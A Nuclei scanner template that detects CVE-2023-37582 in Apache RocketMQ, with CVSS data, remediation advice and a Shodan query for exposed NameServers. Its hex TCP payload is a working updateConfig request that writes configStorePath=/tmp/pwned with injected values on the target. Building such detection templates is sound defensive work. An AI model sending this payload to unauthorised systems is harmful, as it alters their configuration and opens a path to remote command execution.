id: CVE-2023-37582

info:
  name: Apache RocketMQ - Remote Command Execution
  author: daffainfo
  severity: critical
  description: |
    The RocketMQ NameServer component still has a remote command execution vulnerability as the CVE-2023-33246 issue was not completely fixed in version 5.1.1. When NameServer address are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function on the NameServer component to execute commands as the system users that RocketMQ is running as. It is recommended for users to upgrade their NameServer version to 5.1.2 or above for RocketMQ 5.x or 4.9.7 or above for RocketMQ 4.x to prevent these attacks.
  impact: |
    Attackers can execute arbitrary commands on the system, potentially leading to full system compromise.
  remediation: |
    Upgrade RocketMQ to version 5.1.2 or above for 5.x series, or 4.9.7 or above for 4.x series.
  reference:
    - http://www.openwall.com/lists/oss-security/2023/07/12/1
    - https://lists.apache.org/thread/m614czxtpvlztd7mfgcs2xcsg36rdbnc
    - https://github.com/Malayke/CVE-2023-37582_EXPLOIT
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37582
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37582
    cwe-id: CWE-94
    epss-score: 0.90036
    epss-percentile: 0.99778
    cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: rocketmq
    shodan-query: rocketmq port:"9876"
  tags: cve,cve2023,apache,rocketmq,network,intrusive,vkev,vuln

tcp:
  - inputs:
      - data: 000000a4000000617b22636f6465223a3331382c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3430357d636f6e66696753746f7265506174683d2f746d702f70776e65640a70726f64756374456e764e616d653d746573742f706174685c6e746573745c6e74657374
        type: hex

    host:
      - "{{Hostname}}"

    port: 9876
    read-size: 1024

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(raw, "serializeTypeCurrentRPC", "version", "code\":0")'
          - "!contains_any(raw, 'Can not update config','FORBID ACCESS')"
        condition: and
# digest: 490a00463044022065e20a2ad9a5a659a7e7080c377271825377f8db4ed0840fad801e47cba1d95d02203ccb776681e4a966615965e82db58de42976918ff6ab1031b6b518dc3e6d79ae:922c64590222798bb761d5b6d8e72950